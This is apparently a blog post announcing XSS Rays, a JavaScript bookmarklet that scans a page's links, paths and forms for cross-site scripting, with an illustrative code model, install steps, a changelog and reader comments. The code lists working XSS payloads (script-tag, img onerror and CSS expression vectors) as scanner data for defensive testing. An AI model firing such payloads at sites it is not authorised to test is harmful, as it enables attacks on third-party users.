XSS Rays

I’ve developed a new XSS scanner tool written in JavaScript, called XSS Rays, for Microsoft. They have given me permission to release the tool as open source, which is awesome because it can then be used on other open source applications as well. I recommend you use it as part of the web development process to make sure you’ve filtered XSS correctly in your application.

It works as a bookmarklet and scans any links, paths or forms on the target page (even cross domain). You can add vectors to it quite easily, and it includes some of the most common injections I’ve found on sites over the years. I’ve tested it on IE7/IE8 and Firefox, but it could work in other browsers.

The advantage of the bookmarklet is that vectors can be customised for each browser and are executed in the context of the browser itself: in IE8 standards mode, where CSS expressions are disabled, the expression vector simply won’t execute, for example.

Hopefully there should be no false positives either, because each vector is actually executed and reports back as successful; in fact, if there is a false positive it will be a bug in my code (let’s hope not).

Technical details

The code works by creating connections to the target links/paths using iframes; each iframe is assigned a name which is the URL to return to on successful execution (the originating URL). This allows cross domain links to be checked.

The vectors are stored in a simple object; each vector has the following properties: input, name, browser, form, url, path (there’s an optional second input). Input is the XSS vector; the string “XSS” inside it is replaced with a logger or a PoC URL and is required by all vectors.

Name is just a meaningful name applied to the vector. Browser supports ALL|FF|IE and helps to save time when testing browser-specific vectors, as XSS Rays will only run the vector against those browsers.

Form, url and path allow you to disable the vector for scanning forms, URLs or paths respectively; each supports TRUE|FALSE.

There are a few configuration properties supported:-
1. externalLog – Sends all executions to an external logger, by default “http://127.0.0.1/XSS_Rays/logging/xss_logger.php”. The vector is encoded and sent in the GET variable xss; each field is tab separated, so the logger can easily be rewritten in another language.
2. excludeURLS – allows you to exclude certain URLs from the scan; the value is a regular expression, so remember to double escape special characters.
3. sameorigin – When enabled it stays on the same site and does not scan external links; this has not been fully tested yet.
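The following is an added example, not XSS Rays’ own code: a Node-runnable model of the vector table, the browser/target selection, the “XSS” placeholder substitution, the three kinds of probe (url, path, form), the excludeURLS and sameorigin filters, and the tab-separated logger call described above. All names in it (the sample vectors, the function names, the ‘xssray’ query parameter, the example hosts) are assumptions made for this illustration.

```javascript
// Added example, not XSS Rays' own code. Names, sample vectors and sample
// target URLs are assumptions made for this illustration.

// Reporting payload: the post says each scanning iframe is named with the
// originating URL, so a vector that runs inside the target can simply
// navigate back to it (no quotes needed, so it fits inside any attribute).
const REPORT = 'location=window.name';

// Vector table in the shape the post describes. "XSS" is the mandatory
// placeholder; browser is ALL|FF|IE; form/url/path switch targets on or off.
const vectors = [
  { input: '"><script>XSS</script>',              name: 'closeAttrScript', browser: 'ALL', form: true, url: true, path: true  },
  { input: '<img src=x onerror=XSS>',             name: 'imgOnerror',      browser: 'ALL', form: true, url: true, path: false },
  { input: "';XSS;//",                            name: 'jsStringBreak',   browser: 'ALL', form: true, url: true, path: true  },
  { input: '<div style="width:expression(XSS)">', name: 'cssExpression',   browser: 'IE',  form: true, url: true, path: false },
];

const config = {
  externalLog: 'http://127.0.0.1/XSS_Rays/logging/xss_logger.php',
  // Kept as a string and compiled with new RegExp, so backslashes must be
  // doubled: this is the "double escape" the post warns about.
  excludeURLS: 'logout|\\.pdf$',
  sameorigin: true,
};

function renderVector(v, payload = REPORT) {
  if (!v.input.includes('XSS')) throw new Error('vector ' + v.name + ' lacks the XSS placeholder');
  return v.input.split('XSS').join(payload);
}

// browser is what the running bookmarklet detected ('FF' or 'IE');
// type is 'form', 'url' or 'path'.
function selectVectors(list, browser, type) {
  return list.filter(v => (v.browser === 'ALL' || v.browser === browser) && v[type] === true);
}

function shouldScan(href, cfg, originHref) {
  if (cfg.excludeURLS && new RegExp(cfg.excludeURLS).test(href)) return false;
  if (cfg.sameorigin && new URL(href).origin !== new URL(originHref).origin) return false;
  return true;
}

// URL probe: put the rendered vector into every existing query value, or into
// one assumed parameter when the link carries no query string at all.
function buildUrlProbe(href, rendered) {
  const u = new URL(href);
  const keys = [...u.searchParams.keys()];
  if (keys.length === 0) u.searchParams.set('xssray', rendered);
  for (const k of keys) u.searchParams.set(k, rendered);
  return u.href;
}

// Path probe: append the vector as an extra path segment. Only servers that
// reflect the request path will ever execute this, which is why the post's
// comments see 404s for it on other setups.
function buildPathProbe(href, rendered) {
  const u = new URL(href);
  return u.origin + u.pathname.replace(/\/$/, '') + '/' + encodeURIComponent(rendered);
}

// Form probe: fill every field with the vector except excluded names/types,
// which keep their own value so the submit control still sends what the
// application expects (the exclusion facility added in 0.5.0).
function buildFormProbe(form, rendered, exclude = { names: ['submit', 'action'], types: ['submit', 'image', 'file'] }) {
  const fields = {};
  for (const f of form.fields) {
    const keep = exclude.names.includes(f.name) || exclude.types.includes(f.type);
    fields[f.name] = keep ? (f.value || '') : rendered;
  }
  return { action: form.action, method: (form.method || 'get').toUpperCase(), fields };
}

// Logger call: all fields go tab-separated into the single GET variable "xss".
function buildLogUrl(externalLog, fields) {
  return externalLog + '?xss=' + encodeURIComponent(fields.join('\t'));
}

// What a logger written in any language has to do to recover the fields.
function parseLogUrl(logUrl) {
  const raw = new URL(logUrl).searchParams.get('xss');
  return raw === null ? [] : raw.split('\t');
}
```

The excludeURLS check runs before the sameorigin check on purpose: an excluded same-site URL (a logout link, a file download) should never be probed even when the scan is otherwise restricted to the current site.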

There’s an interesting little hack for IE to enable the onload event of a dynamic iframe. I use the following code to create a specific IE loader:-

// The iframe's name is the originating URL plus '#xss', so a vector that runs in
// the target can navigate back here; the inline onload works around old IE
// ignoring an onload assigned to a dynamically created iframe.
// 'ray' + uniqueID is the id the tool gives the iframe.
var ieLoader = "document.getElementById('" + 'ray' + self.uniqueID + "').ieonload()";
var iframe;
if (self.isIE()) {
	try {
		// IE accepts markup in createElement, which sets name and onload at creation time
		iframe = document.createElement('<iframe name="' + location + '#xss" onload="' + ieLoader + '">');
	} catch (e) {
		// not an IE build that supports the markup form, fall back to a plain iframe
		iframe = document.createElement('iframe');
	}
} else {
	iframe = document.createElement('iframe');
}

Download & Instructions

Download here

1. You need to install a local web server like xampp:-

http://www.apachefriends.org/en/xampp.html

2. Once installed, copy the XSS_Rays directory to your web server root (the xampp root is C:\xampp\htdocs\).
3. Open the bookmarklet.html file in the helpers directory of XSS_Rays. Drag it to your bookmarks toolbar on Firefox, or on IE right click the link and click add to favorites (you might get a security warning in IE).
4. Find your web site that you wish to scan, click your bookmarklet. Then press CTRL+SHIFT+X which will now run XSS Rays on the target site.
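As an added example (this is not the contents of XSS Rays’ own bookmarklet.html), here is how a bookmarklet like the one in step 3 typically pulls a script hosted on your own web server into the target page, plus a check that the loader and the externalLog setting point at the same server, since both have to change if you host the tool somewhere other than 127.0.0.1. The script path and the function names are assumptions.

```javascript
// Added example, not XSS Rays' own bookmarklet. The script path below and the
// function names are assumptions made for this illustration.

// Build the javascript: URL that goes into the bookmark. When clicked it runs
// in the origin of the page being viewed, so the appended <script> can read
// that page's links and forms and drive the scan from inside it.
function bookmarkletFor(scriptUrl) {
  const u = new URL(scriptUrl);                         // throws on a malformed URL
  if (!/^https?:$/.test(u.protocol)) throw new Error('scanner script must be served over http(s)');
  const body =
    "(function(){var s=document.createElement('script');" +
    's.src=' + JSON.stringify(u.href) + ';' +          // JSON.stringify quotes and escapes the URL
    "document.getElementsByTagName('head')[0].appendChild(s);})();";
  return 'javascript:' + body;
}

// The loader and the externalLog value should live on the same server: if you
// move one without the other the scan starts but nothing is ever logged.
function sameHost(scriptUrl, externalLog) {
  return new URL(scriptUrl).origin === new URL(externalLog).origin;
}
```

Paste the string returned by bookmarkletFor into a bookmark's location field; a file:// path is rejected on purpose, because a page served over http cannot load a script from the local filesystem.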

Thanks

Big thanks to David Ross, Manuel Caballero and you (you know who you are) for testing and feedback. Thanks to Microsoft for supporting the development of XSS Rays.

Updates….

The latest version of XSS Rays is now online (0.5.0); it contains some speed improvements and bug fixes.

1. Fixed conflicts with form elements named action or submit, which were causing form posts not to be submitted. Thanks Mike W
2. Removed unneeded cleanup code now the IE onload works.
3. Added the ability to exclude certain field types and names from being XSS’d.
4. Fixed name vector to specify window.name which was causing conflicts with image elements.
5. Fixed and checked same origin code. Thanks to Arshan who gave me a kick up the backside :)
6. Removed keyboard shortcut and added a button instead.

New update 0.5.5

1. Fixed Firefox bug with same origin
2. Fixed form Post to allow field names with submit. Thanks Kuza55 for the awesome form post hack :)

35 Responses to “XSS Rays”

  1. RAYH4C writes:

    SO COOL !

    :)

  2. cosine writes:

    4. Find your web site that you wish to scan, click your bookmarklet. Then press CTRL+ALT+X which will now run XSS Rays on the target site.

    ———————–

    it should be ‘ctrl+shift+x’,not ‘ctrl+alt+x’?

  3. Gareth Heyes writes:

    @cosine

    Thanks! I’ve corrected the article

  4. Chris writes:

    unfortunately, some browsers use X as a menu shortcut, so ctrl+shift+x does not seem to work (tested it with IE8 & FF307) :(

  5. Gareth Heyes writes:

    @chris

    I can change the shortcut, any suggestions?

    * Don’t forget you must click the bookmarklet first to activate the shortcut

  6. Gareth Heyes writes:

    Marcin has pointed out if you wish to host XSS Rays at a different location other than 127.0.0.1 you need to do the following:-

    1. Edit the bookmarklet file to point to the correct address in XSS_Rays/helpers/bookmarklet.html
    2. Change the externalLog property in XSS_Rays.js to the new address.

    You can also run a custom logging script which stores the vectors to a database if required.

  7. FBatista writes:

    Does the CTRL+SHIFT+X shortcut work on a Mac? I tried this but nothing happened (the mouse cursor just disappears until I move it again)

  8. Gareth Heyes writes:

    @FBatista

    Could be Apple+Shift+X, I’ll check it on the mac

  9. Mike W. writes:

    I don’t get it. Say if I have a simple form of 3 inputs. Shouldn’t the tool simulate the form submission with the payloads? All the tool does is appending the payload to the target urls, which gets back 404s. Am I missing something here?

  10. Gareth Heyes writes:

    @Mike W

    XSS Rays checks path injections and only works on certain web servers and configurations. If you don’t want it to check paths then switch it off in the js file. FYI XSS Rays scans paths, urls, forms and submits get/posts vectors.

  11. RFS writes:

    This would seem to be a natural fit to work with php-ids (http://php-ids.org/). As they contain a great list of filters, and probably have a comprehensive list of attack vectors that could be simulated by this tool

  12. Gareth Heyes writes:

    @RFS

    Yes any vectors can be included within the vectors array, so that would be no problem.

  13. Mike W. writes:

    @Gareth Heyes

    I played around a little more. What I found is that a single
    <input name=”submit” type=”submit”>
    will throw the tool off track. Here is the form I have
    <form action=”/somewhere” method=”post”>
    <input type=”text” name=”first”>
    <input name=”submit” type=”submit”>
    </form>
    It works if I delete the 2nd input.
    I took a look at the js file, there is a function to scan the form. Not sure why it can’t handle a submission button.

  14. Gareth Heyes writes:

    @Mike W

    Thanks I’ll look into that and have it fixed shortly. I suspect because the application is expecting a known value for the submit button it is failing to inject as all values are attack vectors.

  15. arshan writes:

    the “same site” thing is important for professional testers who want to make sure not to send attacks against 3rd party partners who may not like it.

    as soon as that’s tested and working let us know!

  16. Gareth Heyes writes:

    I’ll add graphs and reporting for all you professionals :P

    Not. :P

  17. miha pi writes:

    so does the javascript download have all the fixes?

  18. Gareth Heyes writes:

    @miha pi

    I’ve fixed the instructions and I’m currently working on some other fixes which should be released today thanks

  19. grosser writes:

    I like the idea but installing some PHP onto a server does not sound good to me.

    It would be really usable as e.g. app engine or something similar. Users just have to use the bookmarklet and do not have to install anything…

  20. Gareth Heyes writes:

    @grosser

    It doesn’t have to be a local server, you can install it anywhere and just modify the configuration. The logging can also be done in a database if you so wish.

  21. Gareth Heyes writes:

    XSS Rays has now been updated, thanks to everyone for the bug reports and suggestions.

  22. Gareth Heyes writes:

    Latest version is now 0.5.3

  23. Balaji D Loganathan writes:

    so nice.

  24. Gareth Heyes writes:

    Latest version is now 0.5.5

  25. HTD writes:

    Hi,

    i liked your article very much,
    and i would also like to point out another article on this blog ->
    XSS Phishing

    Thanks

  26. jagstyle writes:

    isnt the xss function call on Line 175 (scanLinks function) of XSS_RAYS.js missing the href parameter?

    observed:
    this.xss({pathname:location.pathname,search:location.search, type: ‘url’});//scan originating url

    expected:
    this.xss({href:location.href,pathname:location.pathname,search:location.search, type: ‘url’});//scan originating url

  27. Gareth Heyes writes:

    @jagstyle

    Nope this is intentional, I scan the path name of the url

  28. jagstyle writes:

    without it my test hangs at that point with the linkStatus field displaying “url: undefined”

  29. Gareth Heyes writes:

    @jagstyle

    Please can you tell me which browser you are using? It could be a bug in the way it gets the path

  30. jagstyle writes:

    Firefox 3.5.5

    I sent an email with full details. Hopefully it’s helpful.

  31. mindsparc writes:

    Can you please send the details for me too,
    it is not working for me

  32. Gareth Heyes writes:

    Working on a fix for this, there is a bug on firefox but the vectors are intentionally duplicated as there are path injections. A temporary workaround is either comment out the path injections or disable the path option in the vectors.

    I should have a fix soon when I get chance to look at the code.

  33. 3p1C writes:

    I can’t scan something except on 127.0.0.1 despite I changed the xss_rays.js and bookmarklet.php files. When scan start is clicked nothing happens.

  34. jyoti bajoria writes:

    Hi, I tried to use this tool, but I am not able to activate it. I clicked on the link in my favourites and then pressed the combination of keys as mentioned. Help me by giving detailed steps to start this.

  35. Gareth Heyes writes:

    @jyoti @3p1C

    I plan to update the XSS Rays code and release a new version which will hopefully make it more user friendly. In the meantime try editing the XSS_Rays.js file to execute automatically